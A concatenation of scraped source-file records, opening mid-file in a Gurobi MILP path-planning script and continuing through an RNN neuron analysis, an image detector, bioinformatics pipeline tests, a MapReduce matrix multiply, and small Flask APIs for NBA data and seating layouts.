tmp_d=np.linalg.norm(v)\n else:\n res=Next_Point(Oi, Oj, v, r)\n tmp_d=res[0]\n v=res[1]\n d=d+tmp_d\n\n # Calibration check\n # 0:水平 1:垂直\n cal=data[nOj,3]\n V=V+tmp_d*delta\n L=L+tmp_d*delta\n\n if cal==0: #水平\n if (V<=beta1) and (L<=beta2):\n L=0\n elif cal==1: #垂直\n if (V<=alpha1) and (L<=alpha2):\n V=0\n\n if (V>theta) and (L>theta):\n return (False)\n\n return (True)\n\n# Define my callback function\ndef mycallback(model, where):\n if where == GRB.Callback.MIPSOL:\n # MIP solution callback\n# nodecnt = model.cbGet(GRB.Callback.MIPSOL_NODCNT)\n# obj = model.cbGet(GRB.Callback.MIPSOL_OBJ)\n# solcnt = model.cbGet(GRB.Callback.MIPSOL_SOLCNT)\n# x = model.cbGetSolution(model._vars)\n pos=[]\n for j in range(LENGTH):\n for k in range(LENGTH):\n if x[j,k].Xn==1:\n pos.append([j,k])\n\n for k in range(len(pos)-1):\n for j in range(1,len(pos)):\n if pos[j][0]==pos[k][1]:\n t=pos[j]\n pos[j]=pos[k+1]\n pos[k+1]=t\n# print(\"+++++\",For_ZX(pos))\n input(\"Warit!!!\")\n# if where == GRB.Callback.POLLING:\n# # Ignore polling callback\n# pass\n# elif where == GRB.Callback.PRESOLVE:\n# # Presolve callback\n# cdels = model.cbGet(GRB.Callback.PRE_COLDEL)\n# rdels = model.cbGet(GRB.Callback.PRE_ROWDEL)\n# if cdels or rdels:\n# print('%d columns and %d rows are removed' % (cdels, rdels))\n# elif where == GRB.Callback.SIMPLEX:\n# # Simplex callback\n# itcnt = model.cbGet(GRB.Callback.SPX_ITRCNT)\n# if itcnt - model._lastiter >= 100:\n# model._lastiter = itcnt\n# obj = model.cbGet(GRB.Callback.SPX_OBJVAL)\n# ispert = model.cbGet(GRB.Callback.SPX_ISPERT)\n# pinf = model.cbGet(GRB.Callback.SPX_PRIMINF)\n# dinf = model.cbGet(GRB.Callback.SPX_DUALINF)\n# if ispert == 0:\n# ch = ' '\n# elif ispert == 1:\n# ch = 'S'\n# else:\n# ch = 'P'\n# print('%d %g%s %g %g' % (int(itcnt), obj, ch, pinf, dinf))\n# elif where == GRB.Callback.MIP:\n # General MIP callback\n# nodecnt = model.cbGet(GRB.Callback.MIP_NODCNT)\n# objbst = model.cbGet(GRB.Callback.MIP_OBJBST)\n# objbnd = model.cbGet(GRB.Callback.MIP_OBJBND)\n# solcnt = model.cbGet(GRB.Callback.MIP_SOLCNT)\n# if nodecnt - model._lastnode >= 100:\n# model._lastnode = nodecnt\n# actnodes = model.cbGet(GRB.Callback.MIP_NODLFT)\n# itcnt = model.cbGet(GRB.Callback.MIP_ITRCNT)\n# cutcnt = model.cbGet(GRB.Callback.MIP_CUTCNT)\n# print('%d %d %d %g %g %d %d' % (nodecnt, actnodes, \\\n# itcnt, objbst, objbnd, solcnt, cutcnt))\n# if abs(objbst - objbnd) < 0.1 * (1.0 + abs(objbst)):\n# print('Stop early - 10% gap achieved')\n# model.terminate()\n# if nodecnt >= 10000 and solcnt:\n# print('Stop early - 10000 nodes explored')\n# model.terminate()\n# elif where == GRB.Callback.MIPNODE:\n# # MIP node callback\n# print('**** New node ****')\n# if model.cbGet(GRB.Callback.MIPNODE_STATUS) == GRB.Status.OPTIMAL:\n# x = model.cbGetNodeRel(model._vars)\n# model.cbSetSolution(model.getVars(), x)\n# elif where == GRB.Callback.BARRIER:\n# # Barrier callback\n# itcnt = model.cbGet(GRB.Callback.BARRIER_ITRCNT)\n# primobj = model.cbGet(GRB.Callback.BARRIER_PRIMOBJ)\n# dualobj = model.cbGet(GRB.Callback.BARRIER_DUALOBJ)\n# priminf = model.cbGet(GRB.Callback.BARRIER_PRIMINF)\n# dualinf = model.cbGet(GRB.Callback.BARRIER_DUALINF)\n# cmpl = model.cbGet(GRB.Callback.BARRIER_COMPL)\n# print('%d %g %g %g %g %g' % (itcnt, primobj, dualobj, \\\n# priminf, dualinf, cmpl))\n# elif where == GRB.Callback.MESSAGE:\n# # Message callback\n# msg = model.cbGet(GRB.Callback.MSG_STRING)\n# model._logfile.write(msg)\n else:\n pass\n\n#Model setup\nm=Model('MILP')\nx=m.addVars(LENGTH,LENGTH,vtype=GRB.BINARY,name='x')\nv=m.addVars(LENGTH,vtype=GRB.CONTINUOUS,name='v')\nv1=m.addVars(LENGTH,vtype=GRB.CONTINUOUS,name='v1')\nl=m.addVars(LENGTH,vtype=GRB.CONTINUOUS,name='l')\nl1=m.addVars(LENGTH,vtype=GRB.CONTINUOUS,name='l1')\nM=GRB.INFINITY\n\n# Objective\n#for i in range(0,LENGTH):\n# for j in range(0,LENGTH):\n# s=x[i,j]*d[i,j]\n#m.setObjective(s,GRB.MINIMIZE)\n\nobj1=quicksum(x[i,j]*d[i,j]/Optimal[0] for i in range(LENGTH) for j in range(LENGTH))\nobj2=quicksum(x[i,j]/Optimal[1] for i in range(LENGTH) for j in range(LENGTH))\nobj3=quicksum(x[i,j]/Optimal[2] for i in range(LENGTH) for j in range(LENGTH))\n\nm.setObjectiveN(obj1,index=0,weight=w[0],abstol=0.5,name='obj1')\nm.setObjectiveN(obj2,index=1,weight=w[1],abstol=0.5,name='obj2')\n#m.setObjectiveN(obj3,index=2,weight=w[2],abstol=0.5,name='obj3')\n#m.setObjective(obj1,GRB.MINIMIZE)\n\n# Parameter Settings\n#m.setParam(GRB.Param.LogFile,'MILP.log')\n#m.setParam(GRB.Param.MIPGap, 0.003)\nm.setParam(GRB.Param.Threads, 8)\nm.setParam(GRB.Param.TimeLimit, 3600)\nm.setParam(GRB.Param.PoolSearchMode,1) #0 Optimal 1 all 2 N\nm.setParam(GRB.Param.PoolSolutions,20) #N Search Number\n#m.setParam(GRB.Param.PoolGap, 80000) #N Search GAP\n# New V = V1 L=L1\nfor i in range(LENGTH):\n for j in range(LENGTH):\n m.addGenConstrIndicator(x[i, j], 1, v[j] == v1[i] + d[i, j] * EPSIL,name='vv1')\n m.addGenConstrIndicator(x[i, j], 1, l[j] == l1[i] + d[i, j] * EPSIL,name='ll1')\n\n#init and end Constrains\nm.addConstr(v[0]==0,name='initv')\nm.addConstr(l[0]==0,name='initl')\nm.addConstr(v1[0]==0,name='initv1')\nm.addConstr(l1[0]==0,name='initl1')\nm.addConstr(v[LENGTH-1]<=THETA,name='endv')\nm.addConstr(l[LENGTH-1]<=THETA,name='endl')\n\n#Network Settings Constrains\nfor i in range(LENGTH):\n if i==0:\n cons=1\n elif i==LENGTH-1:\n cons=-1\n else:\n cons=0\n xij=quicksum(x[i,j] for j in range(LENGTH))\n xji=quicksum(x[j,i] for j in range(LENGTH))\n m.addConstr(xij-xji==cons,name='network'+str(i))\n\n#Error Constrain\nfor j in range(1,LENGTH-1):\n if c[j]==0:\n for i in range(LENGTH-1):\n m.addGenConstrIndicator(x[i,j],1,l1[j]==0,name='calil10')\n m.addGenConstrIndicator(x[i,j],1,v1[j]==v[j],name='calivv1')\n m.addGenConstrIndicator(x[i,j],1,v[j]<=BETA[0],name='calialph0')\n m.addGenConstrIndicator(x[i,j],1,l[j]<=BETA[1],name='calialph1')\n elif c[j]==1:\n for i in range(LENGTH-1):\n m.addGenConstrIndicator(x[i,j],1,l1[j]==l[j],name='calill1')\n m.addGenConstrIndicator(x[i,j],1,v1[j]==0,name='caliv10')\n m.addGenConstrIndicator(x[i,j],1,v[j]<=ALPHA[0],name='calibeta10')\n m.addGenConstrIndicator(x[i,j],1,l[j]<=ALPHA[1],name='calibeta1')\n# Edge constrain\nm.addConstrs((x[i,j]*d[i,j]*EPSIL<=max(min(ALPHA),min(BETA)) for i in range(LENGTH) for j in range(LENGTH-1)), name='edgecons')\nm.addConstrs((x[i,LENGTH-1]*d[i,LENGTH-1]*EPSIL<=THETA for i in range(LENGTH)) , name='edgecons_1')\n\n\nm.update()\nm.write('milp.lp')\nm.optimize()\nm.objVal\n\nlast=np.array(m.x)\nother=last.reshape(LENGTH+4,LENGTH)[LENGTH:LENGTH+4,:]\ncons=last.reshape(LENGTH+4,LENGTH)[0:LENGTH,:]\npoints_tuple=np.where(cons==1)\npoints=[]\nind=[]\npointsNum=len(points_tuple[0])\nfor i in range(pointsNum):\n points.append([points_tuple[0][i],points_tuple[1][i]])\nfor i in range(pointsNum-1):\n for j in range(1,pointsNum):\n if points[j][0]==points[i][1]:\n t=points[j]\n points[j]=points[i+1]\n points[i+1]=t\nfor i in range(pointsNum):\n ind.append(points[i][1])\n#m.setParam(GRB.Param.SolutionNumber, 0)\n# m.SolCount\nPossible={\"Val\":[],\"Solution\":[]}\nfor i in range(m.SolCount):\n m.setParam(GRB.Param.SolutionNumber, i)\n pos=[]\n Possible[\"Val\"].append(m.PoolObjVal)\n for j in range(LENGTH):\n for k in range(LENGTH):\n if x[j,k].Xn==1:\n pos.append([j,k])\n\n for k in range(len(pos)-1):\n for j in range(1,len(pos)):\n if pos[j][0]==pos[k][1]:\n t=pos[j]\n pos[j]=pos[k+1]\n pos[k+1]=t\n Possible[\"Solution\"].append(pos)\n","sub_path":"CAV Control and Planning Algorithm/Solving_Algorithm/gurobi.py","file_name":"gurobi.py","file_ext":"py","file_size_in_byte":10879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"393622047","text":"import DIClasses\nimport SampleHandler\nimport Utils\nimport ROOT\nimport numpy as np\nimport math\nimport PlotService\nfrom scipy.stats import pearsonr\nfrom scipy.stats import entropy\nfrom keras import backend as K\n\nclass RNNAnlaysis:\n\n def __init__(self,Model,DataSet):\n self.Model = Model\n self.DataSet = DataSet\n\n def PhyNNCompare(self, layer,LCompareVar):\n \"\"\"\n Comparesion of the neuron output in a given layer to variables that are build by using physics intuition\n layer: Which Layer should be used for the comparision?\n LCompareVar: List of Variables to which the neuron Output is compared\n \"\"\"\n ListSamples = DIClasses.Init(LCompareVar,Cuts=True)\n Sampler = SampleHandler.SampleHandler(ListSamples)\n Sampler.norm = False\n Sampler.SequenceLength = 0\n Sampler.Plots = False\n CompareData = Sampler.GetANNInput(verbose=0)\n CompareTrain, CompareTest = CompareData.GetInput(\"Even\")\n train, test = self.DataSet.GetInput(\"Even\")\n\n input1 = self.Model.input # input placeholder\n output1 = [l.output for l in self.Model.layers] # all layer outputs\n fun = K.function([input1, K.learning_phase()],output1) # evaluation function\n LayerOutput = fun([train.Events, 1.])\n Layer = LayerOutput[layer-4]\n for i in range(Layer.shape[1]):\n for j in range(CompareTrain.Events.shape[1]):\n NeuronOutput = DIClasses.DISample(Utils.Transform(Layer[:,i],'MinMax'),CompareTrain.Weights,None,CompareTrain.OutTrue,None,None)\n CompareVar = DIClasses.DISample(Utils.Transform(CompareTrain.Events[:,j],'MinMax'),CompareTrain.Weights,None,CompareTrain.OutTrue,None,None)\n #PlotService.SigBkgHist(NeuronOutput,'Neuron ('+str(i)+') [a.u.]',40,0,1,tag='_Neuron_'+str(i))\n #PlotService.SigBkgHist(CompareVar, LCompareVar[j], 40,0,1,tag='LCompareVar'+str(j))\n Hist2D = PlotService.SigBkg2D(CompareVar,NeuronOutput,'Neuron ('+str(i)+') [a.u.]',LCompareVar[j],30,30,0,1,0,1)\n Utils.stdinfo(\"The mutual information of Neuron {0} and {1} is : {2}\".format(i,LCompareVar[j],self.GetNormedMi(Hist2D)))\n\n def GetNormedMi(self,Hist2D):\n \"\"\"\n Compute the mutual information (normed to the entropy of X and Y) from a 2D histogramm\n \"\"\"\n for i in range(30):\n col = np.array([])\n for j in range(30):\n col = np.append(col,Hist2D.GetBinContent(i,j))\n if(i == 0):\n HistArr = col\n else:\n HistArr = np.c_[HistArr,col]\n pxy = HistArr / float(np.sum(HistArr)) #Convert to probability\n nztotal = pxy > 0\n px = np.sum(pxy, axis=1) #marginal for x over y\n py = np.sum(pxy, axis=0) #marginal for y over x\n pxpy = px[:, None] * py[None, :]\n nzcomb = pxpy > 0\n EntrX = entropy(px[px > 0])\n EntrY = entropy(py[py > 0])\n\n pxy = pxy[nztotal * nzcomb]\n pxpy = pxpy[nztotal * nzcomb]\n \n return 1/math.sqrt(EntrX* EntrY) * np.sum(pxy * np.log(pxy / pxpy))","sub_path":"srcRNN/RNNAnalysis.py","file_name":"RNNAnalysis.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"616500834","text":"import data_preprocess\r\nimport image_analyzer\r\nimport blocks_reader\r\n\r\nfrom PIL import Image\r\n\r\n\r\ndef detector(img_name):\r\n path = \"данные/\"\r\n print(\"Data preprocessing\")\r\n base_img = Image.open(path + img_name)\r\n nimg = data_preprocess.normalized_img(base_img)\r\n\r\n pattern = image_analyzer.create_pattern()\r\n metric = image_analyzer.TriangleMetric(pattern, 28)\r\n\r\n print(\"Analyzing image\")\r\n img = image_analyzer.ImageReader(nimg)\r\n img.find_triangles(metric, base_img)\r\n \r\n img.visualize_centroids(save_file=\"output/trimino_centers.png\")\r\n img.visualize_mask(save_file=\"output/trimino_mask.png\")\r\n \r\n print(\"Blocks detection\")\r\n reader = blocks_reader.BlocksReader(img)\r\n blocks_reader.format_output(img, reader)\r\n return reader\r\n\r\n\r\ns = str(input())\r\nreader = detector(s)","sub_path":"trimino_detection/detector.py","file_name":"detector.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"15854043","text":"import matplotlib\n\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os, sys\n\n# Analyse the distribution of utterance number in dataset\n\ndata_path = sys.argv[1]\n\nutterance_number = [np.load(os.path.join(data_path, f), mmap_mode='r').shape[0] for f in os.listdir(data_path)]\n\nbins = [0, 5, 10, 20, 50, 100, 500]\nhist, bin_edges = np.histogram(utterance_number, bins)\nfig, ax = plt.subplots()\n# Plot the histogram heights against integers on the x axis\nax.bar(range(len(hist)), hist, width=1)\n\n# Set the ticks to the middle of the bars\nax.set_xticks([0.5 + i for i, j in enumerate(hist)])\n\n# Set the xticklabels to a string that tells us what the bin edges were\nax.set_xticklabels(['{} - {}'.format(bins[i], bins[i + 1]) for i, j in enumerate(hist)])\n\n# plt.hist(utterance_number, bins=[0,5,10,20,50,100,500])\n# plt.ylabel('Number of speakers')\n# plt.xlabel('Number of utterance')\nplt.savefig('Distribution.png')\n","sub_path":"sre/dataset_analysing.py","file_name":"dataset_analysing.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"358196592","text":"from core.pony_utils import (\n Tibanna,\n WorkflowRunMetadata,\n ensure_list,\n Awsem,\n merge_source_experiments,\n ProcessedFileMetadata,\n FormatExtensionMap,\n get_extra_file_key,\n create_ffmeta_input_files_from_pony_input_file_list\n)\nimport pytest\nfrom conftest import valid_env\nfrom ..unicorn.test_utils import awsem_error_fun\nfrom core.utils import printlog\nimport mock\n\n\n@pytest.fixture\ndef ff_metadata():\n return {\n \"app_name\": \"md5\",\n \"_tibanna\": {\n \"env\": \"fourfront-webprod\",\n \"settings\": {\n \"url\": \"\",\n \"run_type\": \"md5\",\n \"run_name\": \"md5_4DNFIIE1QWPL.fastq.gz\",\n \"env\": \"fourfront-webprod\",\n \"run_id\": \"4DNFIIE1QWPL.fastq.gz\"\n }\n },\n \"ff_meta\": {\n \"run_platform\": \"AWSEM\",\n \"uuid\": \"71d4d068-1b17-4e99-8b59-cfc561266b45\",\n \"parameters\": [],\n \"workflow\": \"d3f25cd3-e726-4b3c-a022-48f844474b41\",\n \"title\": \"md5 run 2018-02-06 21:41:42.750987\",\n \"award\": \"1U01CA200059-01\",\n \"awsem_job_id\": \"\",\n \"awsem_app_name\": \"md5\",\n \"lab\": \"4dn-dcic-lab\",\n \"run_status\": \"started\",\n \"output_files\": [\n {\n \"type\": \"Output report file\",\n \"workflow_argument_name\": \"report\"\n }\n ],\n \"input_files\": [\n {\n \"ordinal\": 1,\n \"workflow_argument_name\": \"input_file\",\n \"value\": \"b4f6807c-6f93-4b7d-91ff-ff95e801165c\"\n }\n ]\n },\n \"push_error_to_end\": True\n }\n\n\n@pytest.fixture\ndef json_request():\n return {\n \"input_files\": [\n {\n \"bucket_name\": \"encoded-4dn-files\",\n \"object_key\": \"4DNFI067AFHV.fastq.gz\",\n \"uuid\": \"46e82a90-49e5-4c33-afab-9ec90d65cca1\",\n \"workflow_argument_name\": \"fastq1\"\n },\n {\n \"bucket_name\": \"encoded-4dn-files\",\n \"object_key\": \"4DNFI067AFHX.fastq.gz\",\n \"uuid\": \"46e82a90-49e5-4c33-afab-9ec90d65cca2\",\n \"workflow_argument_name\": \"fastq2\"\n },\n {\n \"bucket_name\": \"encoded-4dn-files\",\n \"object_key\": \"4DNFIZQZ39L9.bwaIndex.tgz\",\n \"uuid\": \"1f53df95-4cf3-41cc-971d-81bb16c486dd\",\n \"workflow_argument_name\": \"bwa_index\"\n }\n ],\n \"workflow_uuid\": \"02d636b9-d82d-4da9-950c-2ca994a0943e\",\n \"app_name\": \"hi-c-processing-parta\",\n \"parameters\": {\n \"nThreads\": 8,\n \"teststring\": \"test\",\n }\n }\n\n\n@pytest.fixture\ndef workflow_event_data():\n return {\"workflow\": {\"import_id_list\": [\"FHtnXozBk1C5Fyp2dRmSa2yhFCBBoEcN\"],\n \"app_name\": \"md5\",\n \"task_id\": \"\",\n \"task_input\": {\"app\": \"4dn-dcic/dev/md5\",\n \"project\": \"4dn-dcic/dev\",\n \"name\": \"md5\",\n \"inputs\": {\"input_file\": {\"class\": \"File\",\n \"name\": \"4DNFI7RAJFJ4.fasta.gz\",\n \"path\": \"5877fc32e4b0f31cb4bc37a1\"}}},\n \"volume_list\": [{\"id\": \"4dn-labor/4dn_s32588y8f6\", \"name\": \"4dn_s32588y8f6\"}],\n \"header\": {\"X-SBG-Auth-Token\": \"1234\", \"Content-type\": \"application/json\"},\n \"token\": \"1234\", \"export_report\": [], \"project_id\": \"4dn-dcic/dev\",\n \"export_id_list\": [], \"output_volume_id\": \"4dn-labor/4dn_s32588y8f7\"}}\n\n\ndef test_create_workflowrun_from_event_parameter(update_ffmeta_event_data_newmd5):\n meta = update_ffmeta_event_data_newmd5['ff_meta'].copy()\n meta['app_name'] = 'md5'\n ff_wfr = WorkflowRunMetadata(**meta)\n assert ff_wfr\n\n\ndef test_tibanna():\n data = {'env': 'fourfront-webdev',\n 'settings': {'1': '1'}}\n tibanna = Tibanna(**data)\n assert tibanna\n assert tibanna.as_dict() == data\n\n\ndef test_ensure_list():\n assert ensure_list(5) == [5]\n assert ensure_list('hello') == ['hello']\n assert ensure_list(['hello']) == ['hello']\n assert ensure_list({'a': 'b'}) == [{'a': 'b'}]\n\n\ndef test_create_awsem(update_ffmeta_event_data, tibanna_env):\n update_ffmeta_event_data.update(tibanna_env)\n awsem = Awsem(update_ffmeta_event_data)\n assert awsem.args\n assert awsem.config\n assert awsem.app_name\n assert awsem.output_s3\n assert awsem.output_files_meta\n\n\ndef test_get_output_files(update_ffmeta_event_data, tibanna_env):\n update_ffmeta_event_data.update(tibanna_env)\n awsem = Awsem(update_ffmeta_event_data)\n of = awsem.output_files()\n assert 1 == len(of)\n assert of[0].runner == awsem\n assert of[0].bucket == awsem.output_s3\n assert of[0].key == 'lalala/md5_report'\n assert of[0].argument_type == 'Output report file'\n\n\ndef test_get_input_files(update_ffmeta_event_data, tibanna_env):\n update_ffmeta_event_data.update(tibanna_env)\n awsem = Awsem(update_ffmeta_event_data)\n infiles = awsem.input_files()\n assert 1 == len(infiles)\n assert infiles[0].runner == awsem\n assert infiles[0].bucket == 'elasticbeanstalk-fourfront-webdev-files'\n assert infiles[0].key == 'f4864029-a8ad-4bb8-93e7-5108f462ccaa/4DNFIRSRJH45.fastq.gz'\n assert infiles[0].accession == '4DNFIRSRJH45'\n\n\ndef test_get_inputfile_accession(update_ffmeta_event_data, tibanna_env):\n update_ffmeta_event_data.update(tibanna_env)\n awsem = Awsem(update_ffmeta_event_data)\n assert awsem.get_file_accessions('input_file')[0] == '4DNFIRSRJH45'\n\n\ndef test_get_inputfile_format_if_extra(update_ffmeta_event_data_extra_md5, tibanna_env):\n update_ffmeta_event_data_extra_md5.update(tibanna_env)\n for wf_file in Awsem(update_ffmeta_event_data_extra_md5).output_files():\n assert wf_file.runner.get_format_if_extras('input_file')[0] == 'pairs_px2'\n\n\n@pytest.fixture()\ndef proc_file_in_webdev():\n return {'status': 'released',\n 'uuid': 'f6d5ba22-aaf9-48e9-8df4-bc5c131c96af',\n 'file_format': 'normvector_juicerformat',\n 'accession': '4DNFIRO3UX7I',\n 'award': '/awards/1U01CA200059-01/',\n 'lab': '/labs/4dn-dcic-lab/'}\n\n\ndef test_create_ProcessedFileMetadata_from_get_error_if_no_at_type(ff_keys, proc_file_in_webdev):\n # can use acc, uuid, @id, any valid url\n with mock.patch('core.pony_utils.get_metadata', return_value=proc_file_in_webdev):\n with pytest.raises(Exception) as expinfo:\n ProcessedFileMetadata.get(proc_file_in_webdev['accession'], ff_keys)\n assert \"only load ProcessedFiles\" in str(expinfo.value)\n\n\ndef test_create_ProcessedFileMetadata_from_get(ff_keys, proc_file_in_webdev):\n # can use acc, uuid, @id, any valid url\n file_with_type = proc_file_in_webdev.copy()\n file_with_type['@type'] = ['FileProcessed', 'Item', 'whatever']\n with mock.patch('core.pony_utils.get_metadata', return_value=file_with_type) as ff:\n pf = ProcessedFileMetadata.get(proc_file_in_webdev['accession'], ff_keys)\n assert pf.__dict__ == proc_file_in_webdev\n assert type(pf) is ProcessedFileMetadata\n ff.was_called_once()\n\n\n@valid_env\n@pytest.mark.webtest\ndef test_format_extension_map(run_awsem_event_data):\n tibanna_settings = run_awsem_event_data.get('_tibanna', {})\n # if they don't pass in env guess it from output_bucket\n env = tibanna_settings.get('env')\n # tibanna provides access to keys based on env and stuff like that\n tibanna = Tibanna(env, ff_keys=run_awsem_event_data.get('ff_keys'),\n settings=tibanna_settings)\n\n fe_map = FormatExtensionMap(tibanna.ff_keys)\n assert(fe_map)\n assert 'pairs' in fe_map.fe_dict.keys()\n\n\n@valid_env\n@pytest.mark.webtest\ndef test_merge_source_experiment(run_awsem_event_data):\n input_file = {\n \"bucket_name\": \"elasticbeanstalk-fourfront-webdev-wfoutput\",\n \"workflow_argument_name\": \"input_pairs\",\n \"uuid\": [\"d2c897ec-bdb2-47ce-b1b1-845daccaa571\", \"d2c897ec-bdb2-47ce-b1b1-845daccaa571\"],\n \"object_key\": [\"4DNFI25JXLLI.pairs.gz\", \"4DNFI25JXLLI.pairs.gz\"]\n }\n data = run_awsem_event_data\n tibanna_settings = data.get('_tibanna', {})\n # if they don't pass in env guess it from output_bucket\n env = tibanna_settings.get('env')\n # tibanna provides access to keys based on env and stuff like that\n tibanna = Tibanna(env, ff_keys=data.get('ff_keys'),\n settings=tibanna_settings)\n res = merge_source_experiments(input_file['uuid'], tibanna.ff_keys, tibanna.env)\n printlog(res)\n assert 'fake_source_experiment' in res\n\n\n@valid_env\n@pytest.mark.webtest\ndef test_get_extra_file_key(run_awsem_event_data):\n tibanna_settings = run_awsem_event_data.get('_tibanna', {})\n # if they don't pass in env guess it from output_bucket\n env = tibanna_settings.get('env')\n # tibanna provides access to keys based on env and stuff like that\n tibanna = Tibanna(env, ff_keys=run_awsem_event_data.get('ff_keys'),\n settings=tibanna_settings)\n fe_map = FormatExtensionMap(tibanna.ff_keys)\n infile_key = 'hahaha/lalala.bedGraph.gz'\n infile_format = 'bg'\n extra_file_format = 'bw'\n extra_file_key = get_extra_file_key(infile_format, infile_key, extra_file_format, fe_map)\n assert extra_file_key == 'hahaha/lalala.bw'\n\n\ndef test_powerup_add_awsem_error_to_output(ff_metadata):\n res = awsem_error_fun(ff_metadata, None)\n assert ('error' in res)\n\n\ndef test_create_ffmeta_input_files_from_pony_input_file_list():\n input_file_list = [{\n \"bucket_name\": \"elasticbeanstalk-fourfront-webdev-wfoutput\",\n \"workflow_argument_name\": \"input_pairs1\",\n \"uuid\": [['a', 'b'], ['c', 'd']],\n \"object_key\": [['e', 'f'], ['g', 'h']]\n },\n {\n \"bucket_name\": \"elasticbeanstalk-fourfront-webdev-wfoutput\",\n \"workflow_argument_name\": \"input_pairs2\",\n \"uuid\": [\"d2c897ec-bdb2-47ce-b1b1-845daccaa571\", \"d2c897ec-bdb2-47ce-b1b1-845daccaa571\"],\n \"object_key\": [\"4DNFI25JXLLI.pairs.gz\", \"4DNFI25JXLLI.pairs.gz\"]\n }\n ]\n res = create_ffmeta_input_files_from_pony_input_file_list(input_file_list)\n assert len(res) == 6\n assert 'dimension' in res[0]\n assert res[0]['dimension'] == '0-0'\n assert 'dimension' in res[1]\n assert res[1]['dimension'] == '0-1'\n assert res[1]['ordinal'] == 2\n assert 'dimension' in res[4]\n assert res[4]['dimension'] == '0'\n","sub_path":"tests/core/pony/test_pony_utils.py","file_name":"test_pony_utils.py","file_ext":"py","file_size_in_byte":10614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"499487103","text":"\"\"\"\nMatrix multiplication\n\"\"\"\nimport sys\nfrom itertools import groupby\n\nimport MapReduce\n\nmr = MapReduce.MapReduce()\n\ndef mapper(record):\n \"\"\"Mapper for matrix multiplication\"\"\"\n matrix, i, j, value = record\n if matrix == 'a':\n for ab_j in range(0, 5):\n mr.emit_intermediate((i, ab_j), (matrix, j, value))\n elif matrix == 'b':\n for ab_i in range(0, 5):\n mr.emit_intermediate((ab_i, j), (matrix, i, value))\n else:\n raise RuntimeError('Unexpected matrix {}'.format(matrix))\n\ndef reducer(ij, values):\n \"\"\"Reducer for unique trims\"\"\"\n j_keyfunc = lambda val: val[1]\n sorted_values = sorted(values, key=j_keyfunc)\n row_sum = 0\n for i, col in groupby(sorted_values, j_keyfunc):\n column = list(col)\n if len(column) == 2:\n row_sum += column[0][2] * column[1][2]\n mr.emit((ij[0], ij[1], row_sum))\n\nif __name__ == '__main__':\n with open(sys.argv[1]) as input_data:\n mr.execute(input_data, mapper, reducer)\n","sub_path":"assignment3/multiply.py","file_name":"multiply.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"575760415","text":"# -*- coding: utf-8 -*-\nfrom get_exo import get_exo_2\nimport os\nf = open('start.tex','r')\nexo=f.read()+get_exo_2(150)+\"\\\\end{document}\"\nf.close()\nwith open('a.tex', 'w') as f:\n f.write(exo)\nf.close()\nos.system(\"pdflatex a.tex\")","sub_path":"testpdf.py","file_name":"testpdf.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"170362541","text":"#Joseph Lee and Jesse \"Mcree\" Chen\n#SoftDev1 pd1\n#K24 -- A RESTful Journey Skyward\n#2019-11-13\nfrom flask import Flask, render_template, request, redirect, url_for\nimport json\nfrom urllib.request import urlopen\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef home():\n print(app)\n team = urlopen(\"https://www.balldontlie.io/api/v1/teams/3\")\n json_desc = team.read();\n team_desc = json.loads(json_desc);\n return render_template('home.html',\n team_desc = team_desc\n )\n\nif __name__ == \"__main__\":\n app.debug = True\n app.run()\n","sub_path":"25_restrio/2_nba/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"340960047","text":"from flask_cors import CORS\nfrom flask import Blueprint, request, jsonify\n\n\nfrom ...models.autograder.seating_layout import SeatingLayout\n\n\nseating_layout_api_bp = Blueprint('seating_layout_api', __name__)\nCORS(seating_layout_api_bp, supports_credentials=True)\n\n\n@seating_layout_api_bp.route('/add', methods=['POST'])\ndef add():\n '''\n Route used to create a new seating layout in the DB. Only accepts\n POST requests.\\n\n The `seats` field and the `count` field do not have to be present in the\n body of the POST request.\n @author james-c-lars\n '''\n location = request.json.get('location')\n seats = request.json.get('seats', None)\n count = request.json.get('count', None)\n\n status, layout = SeatingLayout.create_layout(location, seats, count)\n\n # If a layout at that location already existed\n if not status:\n return jsonify({'reason': 'location already exists'}), 300\n\n return jsonify({'reason': 'layout created'}), 200\n\n\n@seating_layout_api_bp.route('/update', methods=['PUT'])\ndef update():\n '''\n Route used to update an existing seating layout in the DB. Only accepts\n PUT requests.\\n\n The `seats` field and the `count` field do not have to be present in the\n body of the PUT request.\n @author james-c-lars\n '''\n location = request.json.get('location')\n seats = request.json.get('seats', None)\n count = request.json.get('count', None)\n\n layout = SeatingLayout.find_by_location(location)\n\n # If a layout at that location was not found\n if not layout:\n return jsonify({'reason': \"layout doesn't exist\"}), 300\n\n layout.seats = seats\n layout.count = count\n layout.save()\n\n return jsonify({'reason': 'layout updated'}), 200\n\n\n@seating_layout_api_bp.route('/get', methods=['GET'])\ndef get():\n '''\n Route used to get a particular layout. Either location or layout_id can be\n provided. If both are given, location is prioritized in the search.\n @author james-c-lars\n '''\n layout_id = request.args.get('layout_id', None, type=int)\n location = request.args.get('location', None, type=str)\n\n layout = SeatingLayout.find_by_location(location)\n\n if not layout:\n layout = SeatingLayout.find_by_id(layout_id)\n\n # If a layout at that location was not found\n if not layout:\n return jsonify({'reason': \"layout doesn't exist\"}), 300\n\n return jsonify({'reason': 'request OK', 'result': layout.to_json()}), 200\n\n\n@seating_layout_api_bp.route('/get_all', methods=['GET'])\ndef get_all():\n '''\n Route used to get all layouts stored in the database.\n @author james-c-lars\n '''\n layouts = [layout.to_json() for layout in SeatingLayout.get_all_layouts()]\n\n return 